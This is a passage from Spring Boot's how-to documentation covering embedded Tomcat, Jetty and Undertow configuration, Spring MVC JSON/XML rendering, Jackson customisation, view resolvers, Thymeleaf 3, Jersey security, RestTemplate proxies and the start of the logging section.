e.g.\n\n[indent=0]\n----\n\tserver.tomcat.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are only required when you're using a properties file for\nconfiguration. If you are using YAML, single backslashes are sufficient and a value\nthat's equivalent to the one shown above would be `192\\.168\\.\\d{1,3}\\.\\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but don't do\nthis in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by\nswitching the automatic one off (i.e. set `server.use-forward-headers=false`) and adding\na new valve instance in a `TomcatEmbeddedServletContainerFactory` bean.\n\n\n\n[[howto-configure-tomcat]]\n=== Configure Tomcat\nGenerally you can follow the advice from\n_<<howto-discover-build-in-options-for-external-properties>>_ about\n`@ConfigurationProperties` (`ServerProperties` is the main one here), but also look at\n`EmbeddedServletContainerCustomizer` and various Tomcat-specific `+*Customizers+` that you\ncan add in one of those. The Tomcat APIs are quite rich so once you have access to the\n`TomcatEmbeddedServletContainerFactory` you can modify it in a number of ways. Or the\nnuclear option is to add your own `TomcatEmbeddedServletContainerFactory`.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nAdd a `org.apache.catalina.connector.Connector` to the\n`TomcatEmbeddedServletContainerFactory` which can allow multiple connectors, e.g. HTTP and\nHTTPS connector:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory tomcat = new TomcatEmbeddedServletContainerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore: [\" + \"keystore\"\n\t\t\t\t\t+ \"] or truststore: [\" + \"keystore\" + \"]\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nThe embedded Tomcat used by Spring Boot does not support \"Version 0\" of the Cookie\nformat out of the box, and you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values\ncompliant with later Cookie specifications. If, however, you're unable to change the\nway that cookies are written, you can instead configure Tomcat to use a\n`LegacyCookieProcessor`. To switch to the `LegacyCookieProcessor` use an\n`EmbeddedServletContainerCustomizer` bean that adds a `TomcatContextCustomizer`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/embedded\/TomcatLegacyCookieProcessorExample.java[tag=customizer]\n----\n\n\n\n[[howto-use-jetty-instead-of-tomcat]]\n=== Use Jetty instead of Tomcat\nThe Spring Boot starters (`spring-boot-starter-web` in particular) use Tomcat as an\nembedded container by default. You need to exclude those dependencies and include the\nJetty one instead. Spring Boot provides Tomcat and Jetty dependencies bundled together\nas separate starters to help make this process as easy as possible.\n\nExample in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t<\/dependency>\n----\n\nExample in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\tcompile.exclude module: \"spring-boot-starter-tomcat\"\n\t}\n\n\tdependencies {\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-web:{spring-boot-version}\")\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-jetty:{spring-boot-version}\")\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[howto-configure-jetty]]\n=== Configure Jetty\nGenerally you can follow the advice from\n_<<howto-discover-build-in-options-for-external-properties>>_ about\n`@ConfigurationProperties` (`ServerProperties` is the main one here), but also look at\n`EmbeddedServletContainerCustomizer`. The Jetty APIs are quite rich so once you have\naccess to the `JettyEmbeddedServletContainerFactory` you can modify it in a number\nof ways. Or the nuclear option is to add your own `JettyEmbeddedServletContainerFactory`.\n\n\n\n[[howto-use-undertow-instead-of-tomcat]]\n=== Use Undertow instead of Tomcat\nUsing Undertow instead of Tomcat is very similar to <<howto-use-jetty-instead-of-tomcat,\nusing Jetty instead of Tomcat>>. You need to exclude the Tomcat dependencies and include\nthe Undertow starter instead.\n\nExample in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-undertow<\/artifactId>\n\t<\/dependency>\n----\n\nExample in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\tcompile.exclude module: \"spring-boot-starter-tomcat\"\n\t}\n\n\tdependencies {\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-web:{spring-boot-version}\")\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-undertow:{spring-boot-version}\")\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[howto-configure-undertow]]\n=== Configure Undertow\nGenerally you can follow the advice from\n_<<howto-discover-build-in-options-for-external-properties>>_ about\n`@ConfigurationProperties` (`ServerProperties` and `ServerProperties.Undertow` are the\nmain ones here), but also look at\n`EmbeddedServletContainerCustomizer`. Once you have access to the\n`UndertowEmbeddedServletContainerFactory` you can use an `UndertowBuilderCustomizer` to\nmodify Undertow's configuration to meet your needs. Or the nuclear option is to add your\nown `UndertowEmbeddedServletContainerFactory`.\n\n\n\n[[howto-enable-multiple-listeners-in-undertow]]\n=== Enable Multiple Listeners with Undertow\nAdd an `UndertowBuilderCustomizer` to the `UndertowEmbeddedServletContainerFactory` and\nadd a listener to the `Builder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic UndertowEmbeddedServletContainerFactory embeddedServletContainerFactory() {\n\t\tUndertowEmbeddedServletContainerFactory factory = new UndertowEmbeddedServletContainerFactory();\n\t\tfactory.addBuilderCustomizers(new UndertowBuilderCustomizer() {\n\n\t\t\t@Override\n\t\t\tpublic void customize(Builder builder) {\n\t\t\t\tbuilder.addHttpListener(8080, \"0.0.0.0\");\n\t\t\t}\n\n\t\t});\n\t\treturn factory;\n\t}\n----\n\n\n\n[[howto-use-tomcat-7]]\n=== Use Tomcat 7.x or 8.0\nTomcat 7 & 8.0 work with Spring Boot, but the default is to use Tomcat 8.5. If you cannot\nuse Tomcat 8.5 (for example, because you are using Java 1.6) you will need to change your\nclasspath to reference a different version.\n\n\n\n[[howto-use-tomcat-7-maven]]\n==== Use Tomcat 7.x or 8.0 with Maven\nIf you are using the starters and parent you can change the Tomcat version property\nand additionally import `tomcat-juli`. E.g. for a simple webapp or service:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<tomcat.version>7.0.59<\/tomcat.version>\n\t<\/properties>\n\t<dependencies>\n\t\t...\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.apache.tomcat<\/groupId>\n\t\t\t<artifactId>tomcat-juli<\/artifactId>\n\t\t\t<version>${tomcat.version}<\/version>\n\t\t<\/dependency>\n\t\t...\n\t<\/dependencies>\n----\n\n\n\n==== Use Tomcat 7.x or 8.0 with Gradle\n[[howto-use-tomcat-7-gradle]]\nWith Gradle, you can change the Tomcat version by setting the `tomcat.version` property\nand then additionally include `tomcat-juli`:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\text['tomcat.version'] = '7.0.59'\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-web'\n\t\tcompile group:'org.apache.tomcat', name:'tomcat-juli', version:property('tomcat.version')\n\t}\n----\n\n\n\n[[howto-use-jetty-9.2]]\n=== Use Jetty 9.2\nJetty 9.2 works with Spring Boot, but the default is to use Jetty 9.3. If you cannot use\nJetty 9.3 (for example, because you are using Java 7) you will need to change your\nclasspath to reference Jetty 9.2.\n\n\n\n[[howto-use-jetty-9.2-maven]]\n==== Use Jetty 9.2 with Maven\n\nIf you are using the starters and parent you can just add the Jetty starter and override\nthe `jetty.version` property:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<jetty.version>9.2.17.v20160517<\/jetty.version>\n\t<\/properties>\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t\t<exclusions>\n\t\t\t\t<exclusion>\n\t\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t\t<\/exclusion>\n\t\t\t<\/exclusions>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t\t<\/dependency>\n\t<\/dependencies>\n----\n\n\n\n[[howto-use-jetty-9.2-gradle]]\n==== Use Jetty 9.2 with Gradle\n\nYou can set the `jetty.version` property. For example, for a simple webapp or service:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\text['jetty.version'] = '9.2.17.v20160517'\n\tdependencies {\n\t\tcompile ('org.springframework.boot:spring-boot-starter-web') {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-tomcat'\n\t\t}\n\t\tcompile ('org.springframework.boot:spring-boot-starter-jetty')\n\t}\n----\n\n\n\n[[howto-use-jetty-8]]\n=== Use Jetty 8\nJetty 8 works with Spring Boot, but the default is to use Jetty 9.3. If you cannot use\nJetty 9.3 (for example, because you are using Java 1.6) you will need to change your\nclasspath to reference Jetty 8. You will also need to exclude Jetty's WebSocket-related\ndependencies.\n\n\n\n[[howto-use-jetty-8-maven]]\n==== Use Jetty 8 with Maven\n\nIf you are using the starters and parent you can just add the Jetty starter with\nthe required WebSocket exclusion and change the version properties, e.g. for a simple\nwebapp or service:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<jetty.version>8.1.15.v20140411<\/jetty.version>\n\t\t<jetty-jsp.version>2.2.0.v201112011158<\/jetty-jsp.version>\n\t<\/properties>\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t\t<exclusions>\n\t\t\t\t<exclusion>\n\t\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t\t<\/exclusion>\n\t\t\t<\/exclusions>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t\t\t<exclusions>\n\t\t\t\t<exclusion>\n\t\t\t\t\t<groupId>org.eclipse.jetty.websocket<\/groupId>\n\t\t\t\t\t<artifactId>*<\/artifactId>\n\t\t\t\t<\/exclusion>\n\t\t\t<\/exclusions>\n\t\t<\/dependency>\n\t<\/dependencies>\n----\n\n\n\n[[howto-use-jetty-8-gradle]]\n==== Use Jetty 8 with Gradle\n\nYou can set the `jetty.version` property and exclude the WebSocket dependency, e.g. for a\nsimple webapp or service:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\text['jetty.version'] = '8.1.15.v20140411'\n\tdependencies {\n\t\tcompile ('org.springframework.boot:spring-boot-starter-web') {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-tomcat'\n\t\t}\n\t\tcompile ('org.springframework.boot:spring-boot-starter-jetty') {\n\t\t\texclude group: 'org.eclipse.jetty.websocket'\n\t\t}\n\t}\n----\n\n\n\n[[howto-create-websocket-endpoints-using-serverendpoint]]\n=== Create WebSocket endpoints using @ServerEndpoint\nIf you want to use `@ServerEndpoint` in a Spring Boot application that used an embedded\ncontainer, you must declare a single `ServerEndpointExporter` `@Bean`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServerEndpointExporter serverEndpointExporter() {\n\t\treturn new ServerEndpointExporter();\n\t}\n----\n\nThis bean will register any `@ServerEndpoint` annotated beans with the underlying\nWebSocket container. When deployed to a standalone servlet container this role is\nperformed by a servlet container initializer and the `ServerEndpointExporter` bean is\nnot required.\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP response compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow. It can be enabled\nvia `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be\nperformed. This can be configured using the `server.compression.min-response-size`\nproperty.\n\nBy default, responses will only be compressed if their content type is one of the\nfollowing:\n\n - `text\/html`\n - `text\/xml`\n - `text\/plain`\n - `text\/css`\n\nThis can be configured using the `server.compression.mime-types` property.\n\n\n\n[[howto-spring-mvc]]\n== Spring MVC\n\n\n\n[[howto-write-a-json-rest-service]]\n=== Write a JSON REST service\nAny Spring `@RestController` in a Spring Boot application should render JSON response by\ndefault as long as Jackson2 is on the classpath. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RestController\n\tpublic class MyController {\n\n\t\t@RequestMapping(\"\/thing\")\n\t\tpublic MyThing thing() {\n\t\t\t\treturn new MyThing();\n\t\t}\n\n\t}\n----\n\nAs long as `MyThing` can be serialized by Jackson2 (e.g. a normal POJO or Groovy object)\nthen `http:\/\/localhost:8080\/thing` will serve a JSON representation of it by default.\nSometimes in a browser you might see XML responses because browsers tend to send accept\nheaders that prefer XML.\n\n\n\n[[howto-write-an-xml-rest-service]]\n=== Write an XML REST service\nIf you have the Jackson XML extension (`jackson-dataformat-xml`) on the classpath, it will\nbe used to render XML responses and the very same example as we used for JSON would work.\nTo use it, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>com.fasterxml.jackson.dataformat<\/groupId>\n\t\t<artifactId>jackson-dataformat-xml<\/artifactId>\n\t<\/dependency>\n----\n\nYou may also want to add a dependency on Woodstox. It's faster than the default StAX\nimplementation provided by the JDK and also adds pretty print support and improved\nnamespace handling:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.codehaus.woodstox<\/groupId>\n\t\t<artifactId>woodstox-core-asl<\/artifactId>\n\t<\/dependency>\n----\n\nIf Jackson's XML extension is not available, JAXB (provided by default in the JDK) will\nbe used, with the additional requirement to have `MyThing` annotated as\n`@XmlRootElement`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@XmlRootElement\n\tpublic class MyThing {\n\t\tprivate String name;\n\t\t\/\/ .. getters and setters\n\t}\n----\n\nTo get the server to render XML instead of JSON you might have to send an\n`Accept: text\/xml` header (or use a browser).\n\n\n\n[[howto-customize-the-jackson-objectmapper]]\n=== Customize the Jackson ObjectMapper\nSpring MVC (client and server side) uses `HttpMessageConverters` to negotiate content\nconversion in an HTTP exchange. If Jackson is on the classpath you already get the\ndefault converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which\nis auto-configured for you.\n\nThe `ObjectMapper` (or `XmlMapper` for Jackson XML converter) instance created by default\nhas the following customized properties:\n\n* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled\n* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled\n\nSpring Boot has also some features to make it easier to customize this behavior.\n\nYou can configure the `ObjectMapper` and `XmlMapper` instances using the environment.\nJackson provides an extensive suite of simple on\/off features that can be used to\nconfigure various aspects of its processing. These features are described in six enums in\nJackson which map onto properties in the environment:\n\n|===\n|Jackson enum|Environment property\n\n|`com.fasterxml.jackson.databind.DeserializationFeature`\n|`spring.jackson.deserialization.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.core.JsonGenerator.Feature`\n|`spring.jackson.generator.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.databind.MapperFeature`\n|`spring.jackson.mapper.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.core.JsonParser.Feature`\n|`spring.jackson.parser.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.databind.SerializationFeature`\n|`spring.jackson.serialization.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.annotation.JsonInclude.Include`\n|`spring.jackson.default-property-inclusion=always\\|non_null\\|non_absent\\|non_default\\|non_empty`\n|===\n\nFor example, to enable pretty print, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<boot-features-external-config-relaxed-binding,\nrelaxed binding>>, the case of `indent_output` doesn't have to match the case of the\ncorresponding enum constant which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured\n`Jackson2ObjectMapperBuilder` bean, and will apply to any mappers created\nusing the builder, including the auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more\n`Jackson2ObjectMapperBuilderCustomizer` beans. Such customizer beans can be ordered and\nBoot's own customizer has an order of 0, allowing additional customization to be applied\nboth before and after Boot's customization.\n\nAny beans of type `com.fasterxml.jackson.databind.Module` will be automatically registered\nwith the auto-configured `Jackson2ObjectMapperBuilder` and applied to any `ObjectMapper`\ninstances that it creates. This provides a global mechanism for contributing custom\nmodules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of\nthat type and mark it as `@Primary`, or, if you prefer the builder-based\napproach, define a `Jackson2ObjectMapperBuilder` `@Bean`. Note that in either case this\nwill disable all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter` then\nthey will replace the default value in the MVC configuration. Also, a convenience bean is\nprovided of type `HttpMessageConverters` (always available if you use the default MVC\nconfiguration) which has some useful methods to access the default and user-enhanced\nmessage converters.\n\nSee also the _<<howto-customize-the-responsebody-rendering>>_ section and the\n{sc-spring-boot-autoconfigure}\/web\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from\n`@RestController`). You can contribute additional converters by simply adding beans of\nthat type in a Spring Boot context. If a bean you add is of a type that would have been\nincluded by default anyway (like `MappingJackson2HttpMessageConverter` for JSON\nconversions) then it will replace the default value. A convenience bean is provided of\ntype `HttpMessageConverters` (always available if you use the default MVC configuration)\nwhich has some useful methods to access the default and user-enhanced message converters\n(useful, for example if you want to manually inject them into a custom `RestTemplate`).\n\nAs in normal MVC usage, any `WebMvcConfigurerAdapter` beans that you provide can also\ncontribute converters by overriding the `configureMessageConverters` method, but unlike\nwith normal MVC, you can supply only additional converters that you need (because Spring\nBoot uses the same mechanism to contribute its defaults). Finally, if you opt-out of the\nSpring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration,\nthen you can take control completely and do everything manually using\n`getMessageConverters` from `WebMvcConfigurationSupport`.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-multipart-file-upload-configuration]]\n=== Handling Multipart File Uploads\nSpring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading\nfiles. By default Spring Boot configures Spring MVC with a maximum file of 1MB per\nfile and a maximum of 10MB of file data in a single request. You may override these\nvalues, as well as the location to which intermediate data is stored (e.g., to the `\/tmp`\ndirectory) and the threshold past which data is flushed to disk by using the properties\nexposed in the `MultipartProperties` class. If you want to specify that files be\nunlimited, for example, set the `spring.http.multipart.max-file-size` property to `-1`.\n\nThe multipart support is helpful when you want to receive multipart encoded file data as\na `@RequestParam`-annotated parameter of type `MultipartFile` in a Spring MVC controller\nhandler method.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/MultipartAutoConfiguration.{sc-ext}[`MultipartAutoConfiguration`]\nsource for more details.\n\n\n\n[[howto-switch-off-the-spring-mvc-dispatcherservlet]]\n=== Switch off the Spring MVC DispatcherServlet\nSpring Boot wants to serve all content from the root of your application `\/` down. If you\nwould rather map your own servlet to that URL you can do it, but of course you may lose\nsome of the other Boot MVC features. To add your own servlet and map it to the root\nresource just declare a `@Bean` of type `Servlet` and give it the special bean name\n`dispatcherServlet` (You can also create a bean of a different type with that name if\nyou want to switch it off and not replace it).\n\n\n\n[[howto-switch-off-default-mvc-configuration]]\n=== Switch off the Default MVC configuration\nThe easiest way to take complete control over MVC configuration is to provide your own\n`@Configuration` with the `@EnableWebMvc` annotation. This will leave all MVC\nconfiguration in your hands.\n\n\n\n[[howto-customize-view-resolvers]]\n=== Customize ViewResolvers\nA `ViewResolver` is a core component of Spring MVC, translating view names in\n`@Controller` to actual `View` implementations. Note that `ViewResolvers` are mainly\nused in UI applications, rather than REST-style services (a `View` is not used to render\na `@ResponseBody`). There are many implementations of `ViewResolver` to choose from, and\nSpring on its own is not opinionated about which ones you should use. Spring Boot, on the\nother hand, installs one or two for you depending on what it finds on the classpath and\nin the application context. The `DispatcherServlet` uses all the resolvers it finds in\nthe application context, trying each one in turn until it gets a result, so if you are\nadding your own you have to be aware of the order and in which position your resolver is\nadded.\n\n`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:\n\n* An `InternalResourceViewResolver` with bean id '`defaultViewResolver`'. This one locates\n physical resources that can be rendered using the `DefaultServlet` (e.g. static\n resources and JSP pages if you are using those). It applies a prefix and a suffix to the\n view name and then looks for a physical resource with that path in the servlet context\n (defaults are both empty, but accessible for external configuration via\n `spring.mvc.view.prefix` and `spring.mvc.view.suffix`). It can be overridden by providing a\n bean of the same type.\n* A `BeanNameViewResolver` with id '`beanNameViewResolver`'. This is a useful member of the\n view resolver chain and will pick up any beans with the same name as the `View` being\n resolved. It shouldn't be necessary to override or replace it.\n* A `ContentNegotiatingViewResolver` with id '`viewResolver`' is only added if there *are*\n actually beans of type `View` present. This is a '`master`' resolver, delegating to all\n the others and attempting to find a match to the '`Accept`' HTTP header sent by the\n client. There is a useful\n https:\/\/spring.io\/blog\/2013\/06\/03\/content-negotiation-using-views[blog about `ContentNegotiatingViewResolver`]\n that you might like to study to learn more, and also look at the source code for detail.\n You can switch off the auto-configured\n `ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.\n* If you use Thymeleaf you will also have a `ThymeleafViewResolver` with id\n '`thymeleafViewResolver`'. It looks for resources by surrounding the view name with a\n prefix and suffix (externalized to `spring.thymeleaf.prefix` and\n `spring.thymeleaf.suffix`, defaults '`classpath:\/templates\/`' and '`.html`'\n respectively). It can be overridden by providing a bean of the same name.\n* If you use FreeMarker you will also have a `FreeMarkerViewResolver` with id\n '`freeMarkerViewResolver`'. It looks for resources in a loader path (externalized to\n `spring.freemarker.templateLoaderPath`, default '`classpath:\/templates\/`') by\n surrounding the view name with a prefix and suffix (externalized to `spring.freemarker.prefix`\n and `spring.freemarker.suffix`, with empty and '`.ftl`' defaults respectively). It can\n be overridden by providing a bean of the same name.\n* If you use Groovy templates (actually if groovy-templates is on your classpath) you will\n also have a `GroovyMarkupViewResolver` with id '`groovyMarkupViewResolver`'. It\n looks for resources in a loader path by surrounding the view name with a prefix and\n suffix (externalized to `spring.groovy.template.prefix` and\n `spring.groovy.template.suffix`, defaults '`classpath:\/templates\/`' and '`.tpl`'\n respectively). It can be overridden by providing a bean of the same name.\n\nCheck out {sc-spring-boot-autoconfigure}\/web\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`],\n{sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`],\n{sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`] and\n{sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\n\n\n\n[[howto-use-thymeleaf-3]]\n=== Use Thymeleaf 3\nBy default, `spring-boot-starter-thymeleaf` uses Thymeleaf 2.1. If you are using the\n`spring-boot-starter-parent`, you can use Thymeleaf 3 by overriding the\n`thymeleaf.version` and `thymeleaf-layout-dialect.version` properties, for example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<thymeleaf.version>3.0.2.RELEASE<\/thymeleaf.version>\n\t\t<thymeleaf-layout-dialect.version>2.1.1<\/thymeleaf-layout-dialect.version>\n\t<\/properties>\n----\n\nNOTE: if you are managing dependencies yourself, look at `spring-boot-dependencies` for\nthe list of artifacts that are related to those two versions.\n\nTo avoid a warning message about the HTML 5 template mode being deprecated and the HTML\ntemplate mode being used instead, you may also want to explicitly configure\n`spring.thymeleaf.mode` to be `HTML`, for example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.thymeleaf.mode: HTML\n----\n\nPlease refer to the\n{github-code}\/spring-boot-samples\/spring-boot-sample-web-thymeleaf3[Thymeleaf 3 sample] to\nsee this in action.\n\nIf you are using any of the other auto-configured Thymeleaf Extras (Spring Security,\nData Attribute, or Java 8 Time) you should also override each of their versions to one\nthat is compatible with Thymeleaf 3.0.\n\n\n\n[[howto-jersey]]\n== Jersey\n\n\n\n[[howto-jersey-spring-security]]\n=== Secure Jersey endpoints with Spring Security\nSpring Security can be used to secure a Jersey-based web application in much the same\nway as it can be used to secure a Spring MVC-based web application. However, if you want\nto use Spring Security's method-level security with Jersey, you must configure Jersey to\nuse `setStatus(int)` rather `sendError(int)`. This prevents Jersey from committing the\nresponse before Spring Security has had an opportunity to report an authentication or\nauthorization failure to the client.\n\nThe `jersey.config.server.response.setStatusOverSendError` must be set to `true` on the\napplication's `ResourceConfig` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jersey\/JerseySetStatusOverSendErrorExample.java[tag=resource-config]\n----\n\n\n\n[[howto-http-clients]]\n== HTTP clients\n\n\n\n[[howto-http-clients-proxy-configuration]]\n=== Configure RestTemplate to use a proxy\nAs described in <<spring-boot-features.adoc#boot-features-restclient-customization>>,\na `RestTemplateCustomizer` can be used with `RestTemplateBuilder` to build a customized\n`RestTemplate`. This is the recommended approach for creating a `RestTemplate` configured\nto use a proxy.\n\nThe exact details of the proxy configuration depend on the underlying client request\nfactory that is being used. Here's an example of configuring\n`HttpComponentsClientRequestFactory` with an `HttpClient` that uses a proxy for all hosts\nexcept `192.168.0.5`.\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/client\/RestTemplateProxyCustomizationExample.java[tag=customizer]\n----\n\n\n\n[[howto-logging]]\n== Logging\n\nSpring Boot has no mandatory logging dependency, except for the Commons Logging API, of\nwhich there are many implementations to choose from. To use http:\/\/logback.qos.ch[Logback]\nyou need to include it and `jcl-over-slf4j` (which implements the Commons Logging API) on\nthe classpath. The simplest way to do that is through the starters which all depend on\n`spring-boot-starter-logging`. For a web application you only need\n`spring-boot-starter-web` since it depends transitively on the logging starter. For\nexample, using Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----\n\nSpring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on\nthe content of the classpath. If Logback is available it is the first choice.\n\nIf the only change you need to make to logging is to set the levels of various loggers\nthen you can do that in `application.properties` using the \"logging.level\" prefix, 